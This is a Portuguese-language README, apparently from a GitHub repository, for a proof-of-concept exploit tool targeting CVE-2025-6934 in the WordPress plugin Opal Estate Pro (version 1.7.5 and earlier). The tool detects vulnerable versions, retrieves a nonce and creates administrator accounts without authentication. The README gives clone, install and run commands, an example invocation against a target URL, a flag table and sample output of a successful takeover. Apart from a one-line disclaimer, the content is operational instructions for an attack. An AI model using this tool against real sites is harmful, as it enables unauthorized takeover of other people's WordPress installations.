
Exploit de PoC automatizado para WordPress Opal Estate Pro que detecta versões vulneráveis, recupera o nonce e cria contas de administrador não autorizadas.
CVE-2025-6934 é um exploit de prova de conceito (PoC) que visa o Plugin WordPress: Opal Estate Pro ≤ 1.7.5.
Este exploit demonstra a criação de conta de administrador sem autenticação.
Aviso: Este PoC é apenas para fins educacionais. Não use em sistemas sem permissão.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Requisitos:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | Descrição | Obrigatório | Padrão |
|---|---|---|---|
-u, --url | URL do site alvo | Sim | - |
-mail, --newmail | E-mail para novo administrador | Sim | - |
-password, --newpassword | Senha para novo administrador | Sim | - |
-user, --username | Nome de usuário para novo administrador | Não | administrator |
O console exibe:
[•][✔][✖][i]Exemplo:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Sou um desenvolvedor ativo que gosta de criar ferramentas e compartilhar conhecimento. Você pode me encontrar por: